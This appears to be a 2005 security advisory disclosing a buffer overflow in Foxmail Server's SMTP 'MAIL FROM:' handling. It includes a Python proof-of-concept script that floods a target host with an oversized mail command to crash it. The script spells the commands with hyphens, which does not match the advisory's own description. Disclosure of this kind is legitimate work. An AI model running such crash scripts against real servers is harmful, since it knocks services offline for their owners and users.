Foxmail Server Remote Buffer Overflow Vulnerability
DATE:
02/04/2005
AUTHOR:
(Fortinet, inc)
xouyang<xouyang_at_fortinet.com> <oyxin@xxxxxxxxxxx>
PRODUCTS:
Foxmail Server- A MAil server for both Windows and linux.
AFFECTED VERSION:
Foxmail server for windows version 2.0(Newest).I just test windows server
,maybe linux version have vulnerability too.
Description:
Foxmail-the Email client application is the most famous software product in
China. Chinese version is sold to more than 3 million users and English version
to over 20 countries. It is listed as "Top Ten Domestic Software" and evaluated
as "5 Star Software" by ZDNET.
BODA s NT/Linux-based email server system is featured by stability,
security, ease of installation and maintenance, rich functions. Different
versions of product can meet the varied needs ranging from small/medium- sized
enterprises to ISPs/ICPs/ASPs.
DOWNLOAD:
http://www.foxmail.com.cn/english/english_3.htm
http://fox.foxmail.com.cn/cgi/download/nt/nph-install_nt.cgi
Detail:
A vulnerabilities have been identified in Foxmail server , which can be
exploited by malicious people to cause a DoS (Denial of Service) or maybe
compromise a vulnerable server.
The vulnerabilities are caused due to boundary errors in the handling of
the "MAIL FROM:" commands. A malicious person can exploit this by supplying a
long, specially crafted argument to the vulnerable commands, which will result
in a buffer overflow.
Successful exploitation will cause a DOS or maybe allow execution of
arbitrary code with SYSTEM privileges.
FOXmail POC exploit:
#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt
def usage():
print "Usage: foxserver.py -h host -p port"
sys.exit(0)
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:], "h:p:")
except getopt.GetoptError, msg:
print msg
usage()
for o,a in opts:
if o in ["-h"]:
host = a
if o in ["-p"]:
port = int(a)
evilbuf = "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"
evilbuf += "RCPT-TO: postmaster@xxxxxxxxxxxxxxxx" + "\r\n"
evilbuf += "Message-ID: 123" + "\r\n"
evilbuf += "ASDF" + "\r\n"
evilbuf += "." + "\r\n"
evilbuf += "QUIT" + "\r\n"
try:
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((host, port))
recvbuf = sockfd.recv(1024)
print `recvbuf`
sockfd.send("HELO localhost\r\n")
recvbuf = sockfd.recv(1024)
print `recvbuf`
sockfd.send(evilbuf)
except socket.error, msg:
print msg
sockfd.close()
THANKS:
Thanks felix and Ning Wang who in fortinet security research team to verify
this Vulnerability